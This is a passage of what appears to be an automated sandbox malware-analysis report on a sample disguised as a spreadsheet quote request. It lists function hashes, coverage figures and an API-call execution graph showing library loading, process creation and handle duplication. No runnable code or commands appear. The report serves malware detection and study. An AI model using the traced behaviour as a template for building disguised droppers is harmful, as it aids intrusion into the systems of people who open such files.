                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0b57680fcf05a0afd29cd6bae634a3862620adce72c8003346fb9c457c1e53a
                                              • Instruction ID: 9fd2d407719f6dc30ae5b9287299f93ad9dcf778bf8e875386ba3b2876aa30c6
                                              • Opcode Fuzzy Hash: e0b57680fcf05a0afd29cd6bae634a3862620adce72c8003346fb9c457c1e53a
                                              • Instruction Fuzzy Hash: E021BA70700101DFEF22DB2CF84876A3767EB56B54F14496AE50ACB376DA349C458F41
                                              Function 014FFF28 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56f567b9e46c93d9aae2ab5a48a48f88292e5d52b6a2138460473bb2ec2254ba
                                              • Instruction ID: 3b73ae18c756d747c9271b4fb1d992369f2bab57a98e7be2b85563aac6ec714f
                                              • Opcode Fuzzy Hash: 56f567b9e46c93d9aae2ab5a48a48f88292e5d52b6a2138460473bb2ec2254ba
                                              • Instruction Fuzzy Hash: D301D232B016155BCB6A777D442413E6A9BAFC6210B54447F9B0ACB7A4EE30C90687E2
                                              Function 014F9308 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9f22ad35f185fe6c74a9b85e401472ac481546ca56a9f0617d52e5954cce090
                                              • Instruction ID: 8ec1c7a3f35d3155b2afcf73f6ad33d0d627cca1dc5abe680f6523d34f62bf66
                                              • Opcode Fuzzy Hash: c9f22ad35f185fe6c74a9b85e401472ac481546ca56a9f0617d52e5954cce090
                                              • Instruction Fuzzy Hash: 14218571E0020A9BDB19CF69D59479EFBB2FF89304F10852AE905EB3A1DB70D845CB90
                                              Function 014F91F8 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 713ef59c9a180bb9f5976b437aac30577f94af038058b501ab8309e79b6e8df7
                                              • Instruction ID: 430a9561082f21fd022f5e67cb17921f19980e992c45530316e04a3c7375027c
                                              • Opcode Fuzzy Hash: 713ef59c9a180bb9f5976b437aac30577f94af038058b501ab8309e79b6e8df7
                                              • Instruction Fuzzy Hash: E921B034E002058BCB19CFA9D5506DEBBB6AF89314F11892EF901FB365DB70A842CB80
                                              Function 014F9AD2 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bdca1170cc0298fabb824e202b6b4a6d181d1ab5061d8ec13c84b7b7b11c2228
                                              • Instruction ID: 97e6dc9fb96658c6b595179fe6a19539400303cd883f07ed0ce0e6efe0d2a7c9
                                              • Opcode Fuzzy Hash: bdca1170cc0298fabb824e202b6b4a6d181d1ab5061d8ec13c84b7b7b11c2228
                                              • Instruction Fuzzy Hash: B021B271A101098FEB11CF6DC954BAE7BF6BF88714F10806EE601EB3B1DAB58C008B50
                                              Function 014F9AD8 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b291641a5905b87b0c5352959f32aff818f61358a4ee51a22a6ad025d3ff6f89
                                              • Instruction ID: 025690c4e59a975a16f4952c7ab4a1ad43a631a547ad0ac3d262b4e1765c1a0a
                                              • Opcode Fuzzy Hash: b291641a5905b87b0c5352959f32aff818f61358a4ee51a22a6ad025d3ff6f89
                                              • Instruction Fuzzy Hash: 65216D71A101098FEB149F6DC954BAE7AF6BF88714F20816EE605EB3B5DA719C008B90
                                              Function 014F1848 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ee7e8344b3ad81851f0f37015b67c01711051ea8e51b3eb1d77f09464bf575a
                                              • Instruction ID: b8ae716fa4719108fb4201829fbd12d4cfa8b96aeb8030c7f84eb1a0570f0906
                                              • Opcode Fuzzy Hash: 4ee7e8344b3ad81851f0f37015b67c01711051ea8e51b3eb1d77f09464bf575a
                                              • Instruction Fuzzy Hash: C4212730B00255CFEB25DB79C658BAE77F6EB49644F2004AED205EB360DB369D41CBA1
                                              Function 014F4F5A Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a8bbf0ccda158e8871a833559cb115d13c5ddaba422ba06708fdc5396362d38
                                              • Instruction ID: f3a68870113b987a4e3c01a9db8d854afaa9458ffb1db2fc05381ac464632ff9
                                              • Opcode Fuzzy Hash: 0a8bbf0ccda158e8871a833559cb115d13c5ddaba422ba06708fdc5396362d38
                                              • Instruction Fuzzy Hash: 3E21F474700205CFDB24DF78D558AAEBBF1EB48600B1000ADE506EB365DB3A9D40CBA1
                                              Function 0141D030 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265193526.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_141d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e5e0117115dcfed45b979b21c46d9992b4b5953678ccd835c3275292d2f3b08
                                              • Instruction ID: 1b782b43e6c0795ca759e5d83c56950b857c980ddc209ebfc65806d3341a6b7d
                                              • Opcode Fuzzy Hash: 9e5e0117115dcfed45b979b21c46d9992b4b5953678ccd835c3275292d2f3b08
                                              • Instruction Fuzzy Hash: B82125F5904200DFCB15DF58D988B26BF65EB84318F24C56ED80A0B36AC33AD847CA62
                                              Function 014F9208 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 053aa7da6d2a630180042792f88bff0c8f2562900388b41d9ca54a84e4b5e08c
                                              • Instruction ID: f55efd7e9b7e5fea2b613713fe3daf72e8120973cd49995a8a3aa82dbf03c79e
                                              • Opcode Fuzzy Hash: 053aa7da6d2a630180042792f88bff0c8f2562900388b41d9ca54a84e4b5e08c
                                              • Instruction Fuzzy Hash: 7B21C234E002098BDB19CFA9C54069EBBB6BF89310F11892FF901FB361DB70A842CB50
                                              Function 014F1858 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd0026119be84d38249e7094c4835ec25a9a9ca04d692aac831857b9667f544b
                                              • Instruction ID: bc4a9f7cbd5a54778b0595791456f19c0353679b59a6d17e6cb487f92fc72c47
                                              • Opcode Fuzzy Hash: bd0026119be84d38249e7094c4835ec25a9a9ca04d692aac831857b9667f544b
                                              • Instruction Fuzzy Hash: FC216A34B00215CFDB25EB79C6147AE77F6AB49A44F20046ED206EB370DB369D41CBA1
                                              Function 014F1680 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 687b58492f778d11c3b67cc3ab2ae23b89097706cdc398e800cd88f26d3cb4aa
                                              • Instruction ID: fc4d510f716ad50bfca7c6764a8ba5a5e9d71aab3e1f8edcc4eab846b88bb41c
                                              • Opcode Fuzzy Hash: 687b58492f778d11c3b67cc3ab2ae23b89097706cdc398e800cd88f26d3cb4aa
                                              • Instruction Fuzzy Hash: B22163707001019BEF22DB6CF888B5A375BEB49B54F544926E50BCB37ADE389D448F81
                                              Function 0141D006 Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265193526.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_141d000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd0b48a1a0a9893c218a5fe342889512dc5163b5f90830b8d89d88f1aad3b029
                                              • Instruction ID: 8b45a1f33874eb22fd8b6119f2737c258dcf996360159aaaec96af00711dfd17
                                              • Opcode Fuzzy Hash: cd0b48a1a0a9893c218a5fe342889512dc5163b5f90830b8d89d88f1aad3b029
                                              • Instruction Fuzzy Hash: 74216DB15093C09FDB07CF64D994711BF71EB46214F29C5DBD8898F2A7C23A981ACB62
                                              Function 014F4F68 Relevance: .1, Instructions: 68COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 399230500dd0ef4526a20ef85a1ed4a6f2988f61252ab2dba62fbd9e1952aa8b
                                              • Instruction ID: d8b58cb72268a75fe0425de1986b6844c8461fd088045da17fe51e17e08e2c72
                                              • Opcode Fuzzy Hash: 399230500dd0ef4526a20ef85a1ed4a6f2988f61252ab2dba62fbd9e1952aa8b
                                              • Instruction Fuzzy Hash: 7321E574700205CFDB24DF79D558AAEBBF1EB88600B1040A9E606EB375DB3A9D40CBA1
                                              Function 014F6F40 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e545f0c166065f57956ade7b99899aab848ae3681c83ce6440ca4607d74ce67
                                              • Instruction ID: 35acf419127192cb5846cac49124f1354fcf198b10968e527cea6e2880e955a0
                                              • Opcode Fuzzy Hash: 9e545f0c166065f57956ade7b99899aab848ae3681c83ce6440ca4607d74ce67
                                              • Instruction Fuzzy Hash: 7911B231F001458ADB109BB9941436FBBA5EB84320F50457ED51AD7396EB35884583A2
                                              Function 014F0838 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d602a321812a161180241f64bb18efcf142ca43a658a18296321543b44e451e1
                                              • Instruction ID: 1708b15a633c18939916e50536bb6918124b734d45392a1613c905bade4874c2
                                              • Opcode Fuzzy Hash: d602a321812a161180241f64bb18efcf142ca43a658a18296321543b44e451e1
                                              • Instruction Fuzzy Hash: 50119D30B012009BEF268A7C944436A36A3EB86214F20496FF603CB363DA35CD818BC1
                                              Function 014F0848 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: acccd81e84d2d7af06e9021ecd83a5778d1b49883c0ba0a5774382f8ccc51bec
                                              • Instruction ID: 482f1ab7d91cc617a1131452d33c1dbabd8999db0f50c90b5d71fced40080317
                                              • Opcode Fuzzy Hash: acccd81e84d2d7af06e9021ecd83a5778d1b49883c0ba0a5774382f8ccc51bec
                                              • Instruction Fuzzy Hash: ED118F30B012049BEF269A7DD44472E36A7EB85654F60497EF607CB363DA75DC818BC1
                                              Function 014F1468 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c59eb4c742e40c6432c29bf14aa381942912dd24431c6d5115ba9ace4ee48f4e
                                              • Instruction ID: cd0d2974623c7782e7470b1562c35f6ee2226e6dc22041fc91ccaceae618fb69
                                              • Opcode Fuzzy Hash: c59eb4c742e40c6432c29bf14aa381942912dd24431c6d5115ba9ace4ee48f4e
                                              • Instruction Fuzzy Hash: 84016D31A01215CFCB21EFB984501AE7BE6EB98610B1400BFEA05E7312E735D8428BA5
                                              Function 014F9940 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84c1b3245eae6ed3877f6723b9e7d64114a31c5d11c7959513597ad005f93541
                                              • Instruction ID: 270475fe9bc6e8df878b52260f37b3bc764c045f7e644da3188e6a129d4e1fd8
                                              • Opcode Fuzzy Hash: 84c1b3245eae6ed3877f6723b9e7d64114a31c5d11c7959513597ad005f93541
                                              • Instruction Fuzzy Hash: D901F530A001058BCB00DF5ADC84B8BBBA5FF84311F54C57AD9081F3A6DB70A945CBA0
                                              Function 014FFF18 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 874f469d3b866e513ca61e292d686a18042628049903e55ba12e73b9b28095c4
                                              • Instruction ID: 48abb5fa22a2cd89b7a9d16c7db72535f4f77f20d034df90b1a68f7f23e049f5
                                              • Opcode Fuzzy Hash: 874f469d3b866e513ca61e292d686a18042628049903e55ba12e73b9b28095c4
                                              • Instruction Fuzzy Hash: 91F0D122A096516B9766627D582057E7E9A8EC3120B4840AF9B55DB3A2DE308906C2F3
                                              Function 014F7128 Relevance: .0, Instructions: 40COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab7e070bdcfd6b88ba4712ea639acff1a2c6da9acf459d00f924eb3297f9a36a
                                              • Instruction ID: 14a4085ee5709345c3cc4f4d34bb2844970d0abd535560b3f794437bc70edac5
                                              • Opcode Fuzzy Hash: ab7e070bdcfd6b88ba4712ea639acff1a2c6da9acf459d00f924eb3297f9a36a
                                              • Instruction Fuzzy Hash: 5001A239B00119CFC714DB68E698A59B7B2EF89215B5540A8E50ADB378DF35AD02CB40
                                              Function 014F819A Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87f2db9e5551571feb724aed2856b05f0c922acf7a75c35bcf17c09a71f35e74
                                              • Instruction ID: 5099871a631e9c1f77de683bab8f0d26ec5e78f38bf533c630489d23868d8229
                                              • Opcode Fuzzy Hash: 87f2db9e5551571feb724aed2856b05f0c922acf7a75c35bcf17c09a71f35e74
                                              • Instruction Fuzzy Hash: 92018F702142459FDB06DBACFA8058C7F72EF52244B5056EDD8419F1B7DE396E06C781
                                              Function 014F14F4 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b64f595906abb35a2d8fac61267594ee0b3c8d58ca8a0dd26d38ce07466c924
                                              • Instruction ID: 2af891bf1a371e5c6efe3cbf07fa03b0a6eab490a2921eb1c9bedd17af02dfb3
                                              • Opcode Fuzzy Hash: 1b64f595906abb35a2d8fac61267594ee0b3c8d58ca8a0dd26d38ce07466c924
                                              • Instruction Fuzzy Hash: 7DF0F637A04150CBDB22CBA988901AD7FA1EEE961075800EFDB05DB372D335D543C751
                                              Function 014F81A8 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3265876746.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_14f0000_RFQ-101432620247fl#U00e2#U00aexslx.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 525582eff8181c0d4ad5582346516d03a4374d084feeebb19f575abc321878ee
                                              • Instruction ID: dce655cadc6eca010699766901771c3ff7733a5e3835ee7c277289f8ada93a7c
                                              • Opcode Fuzzy Hash: 525582eff8181c0d4ad5582346516d03a4374d084feeebb19f575abc321878ee
                                              • Instruction Fuzzy Hash: F2F0AF70B10209EFDB05EFACFA8058C7FB6EF54304F5096A8C8059B265EE346E458B80

                                              Execution Graph

                                              Execution Coverage:12.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:144
                                              Total number of Limit Nodes:9
                                              execution_graph 28353 16d4668 28354 16d4672 28353->28354 28358 16d4759 28353->28358 28363 16d3e34 28354->28363 28356 16d468d 28359 16d477d 28358->28359 28369 16d4868 28359->28369 28373 16d4858 28359->28373 28364 16d3e3f 28363->28364 28381 16d5c7c 28364->28381 28366 16d70cf 28385 16d5c8c 28366->28385 28368 16d7100 28368->28356 28371 16d488f 28369->28371 28370 16d496c 28370->28370 28371->28370 28377 16d44b4 28371->28377 28374 16d4868 28373->28374 28375 16d44b4 CreateActCtxA 28374->28375 28376 16d496c 28374->28376 28375->28376 28378 16d58f8 CreateActCtxA 28377->28378 28380 16d59bb 28378->28380 28380->28380 28382 16d5c87 28381->28382 28383 16d5c8c 2 API calls 28382->28383 28384 16d7135 28383->28384 28384->28366 28386 16d5c97 28385->28386 28389 16d5ccc 28386->28389 28388 16d71d5 28388->28368 28390 16d5cd7 28389->28390 28393 16d5cfc 28390->28393 28392 16d72ba 28392->28388 28394 16d5d07 28393->28394 28397 16d5d2c 28394->28397 28396 16d73ad 28396->28392 28398 16d5d37 28397->28398 28400 16d890b 28398->28400 28404 16dabb0 28398->28404 28399 16d8949 28399->28396 28400->28399 28408 16dcca0 28400->28408 28413 16dccb0 28400->28413 28418 16daff0 28404->28418 28421 16dafe2 28404->28421 28405 16dabc6 28405->28400 28409 16dccd1 28408->28409 28410 16dccf5 28409->28410 28445 16dd268 28409->28445 28449 16dd258 28409->28449 28410->28399 28414 16dccd1 28413->28414 28415 16dccf5 28414->28415 28416 16dd268 2 API calls 28414->28416 28417 16dd258 2 API calls 28414->28417 28415->28399 28416->28415 28417->28415 28425 16db0e8 28418->28425 28419 16dafff 28419->28405 28422 16daff0 28421->28422 28424 16db0e8 2 API calls 28422->28424 28423 16dafff 28423->28405 28424->28423 28426 16db0f9 28425->28426 28427 16db11c 28425->28427 28426->28427 28433 16db380 28426->28433 28437 16db370 28426->28437 28427->28419 28428 16db114 28428->28427 28429 16db320 GetModuleHandleW 28428->28429 28430 16db34d 28429->28430 28430->28419 28434 16db394 28433->28434 28436 16db3b9 28434->28436 28441 16dad9c 28434->28441 28436->28428 28438 16db380 28437->28438 28439 16db3b9 28438->28439 28440 16dad9c LoadLibraryExW 28438->28440 28439->28428 28440->28439 28442 16db560 LoadLibraryExW 28441->28442 28444 16db5d9 28442->28444 28444->28436 28446 16dd275 28445->28446 28447 16dd2af 28446->28447 28453 16dd030 28446->28453 28447->28410 28450 16dd275 28449->28450 28451 16dd2af 28450->28451 28452 16dd030 2 API calls 28450->28452 28451->28410 28452->28451 28454 16dd03b 28453->28454 28456 16ddbc0 28454->28456 28457 16dd15c 28454->28457 28456->28456 28458 16dd167 28457->28458 28459 16d5d2c 2 API calls 28458->28459 28460 16ddc2f 28459->28460 28460->28456 28468 50d0295 28469 50d022a 28468->28469 28471 50d00d4 28468->28471 28470 50d00e3 28471->28470 28474 50d2220 28471->28474 28480 50d2230 28471->28480 28475 50d2230 28474->28475 28486 50d22ce 28475->28486 28493 50d2270 28475->28493 28499 50d2260 28475->28499 28476 50d2257 28476->28469 28481 50d2245 28480->28481 28483 50d22ce CreateProcessA 28481->28483 28484 50d2260 CreateProcessA 28481->28484 28485 50d2270 CreateProcessA 28481->28485 28482 50d2257 28482->28469 28483->28482 28484->28482 28485->28482 28487 50d225c 28486->28487 28489 50d22d1 28486->28489 28488 50d22ae 28487->28488 28505 50d266e 28487->28505 28510 50d2578 28487->28510 28515 50d2588 28487->28515 28488->28476 28489->28476 28494 50d228a 28493->28494 28495 50d22ae 28494->28495 28496 50d266e CreateProcessA 28494->28496 28497 50d2588 CreateProcessA 28494->28497 28498 50d2578 CreateProcessA 28494->28498 28495->28476 28496->28495 28497->28495 28498->28495 28500 50d2270 28499->28500 28501 50d266e CreateProcessA 28500->28501 28502 50d2588 CreateProcessA 28500->28502 28503 50d22ae 28500->28503 28504 50d2578 CreateProcessA 28500->28504 28501->28503 28502->28503 28503->28476 28504->28503 28506 50d2659 28505->28506 28507 50d263c 28505->28507 28506->28488 28507->28506 28520 730fc48 28507->28520 28512 50d25bb 28510->28512 28511 50d2659 28511->28488 28512->28511 28514 730fc48 CreateProcessA 28512->28514 28513 50d26f9 28513->28488 28514->28513 28517 50d25bb 28515->28517 28516 50d2659 28516->28488 28517->28516 28519 730fc48 CreateProcessA 28517->28519 28518 50d26f9 28518->28488 28519->28518 28521 730fcd1 CreateProcessA 28520->28521 28523 730fe93 28521->28523 28461 50d3540 28462 50d36cb 28461->28462 28464 50d3566 28461->28464 28464->28462 28465 50d194c 28464->28465 28466 50d37c0 PostMessageW 28465->28466 28467 50d382c 28466->28467 28467->28464 28524 16dd380 28525 16dd3c6 28524->28525 28529 16dd550 28525->28529 28533 16dd560 28525->28533 28526 16dd4b3 28530 16dd560 28529->28530 28536 16dd0f8 28530->28536 28534 16dd0f8 DuplicateHandle 28533->28534 28535 16dd58e 28534->28535 28535->28526 28537 16dd5c8 DuplicateHandle 28536->28537 28538 16dd58e 28537->28538 28538->28526

                                              Executed Functions

                                              Function 0730FC48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 572 730fc48-730fcdd 574 730fd16-730fd36 572->574 575 730fcdf-730fce9 572->575 580 730fd38-730fd42 574->580 581 730fd6f-730fd9e 574->581 575->574 576 730fceb-730fced 575->576 578 730fd10-730fd13 576->578 579 730fcef-730fcf9 576->579 578->574 582 730fcfb 579->582 583 730fcfd-730fd0c 579->583 580->581 584 730fd44-730fd46 580->584 591 730fda0-730fdaa 581->591 592 730fdd7-730fe91 CreateProcessA 581->592 582->583 583->583 585 730fd0e 583->585 586 730fd48-730fd52 584->586 587 730fd69-730fd6c 584->587 585->578 589 730fd54 586->589 590 730fd56-730fd65 586->590 587->581 589->590 590->590 593 730fd67 590->593 591->592 594 730fdac-730fdae 591->594 603 730fe93-730fe99 592->603 604 730fe9a-730ff20 592->604 593->587 595 730fdb0-730fdba 594->595 596 730fdd1-730fdd4 594->596 598 730fdbc 595->598 599 730fdbe-730fdcd 595->599 596->592 598->599 599->599 600 730fdcf 599->600 600->596 603->604 614 730ff30-730ff34 604->614 615 730ff22-730ff26 604->615 617 730ff44-730ff48 614->617 618 730ff36-730ff3a 614->618 615->614 616 730ff28 615->616 616->614 620 730ff58-730ff5c 617->620 621 730ff4a-730ff4e 617->621 618->617 619 730ff3c 618->619 619->617 623 730ff6e-730ff75 620->623 624 730ff5e-730ff64 620->624 621->620 622 730ff50 621->622 622->620 625 730ff77-730ff86 623->625 626 730ff8c 623->626 624->623 625->626
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0730FE7E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2107685073.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7300000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 760f1d2063bd9e8a35bc0f8334cc9ddcafbc441880cb19a824e30bce46340afe
                                              • Instruction ID: fa5c73e74646abcec190035e9ce0a34136a613d996b7f112694061b33f2948b1
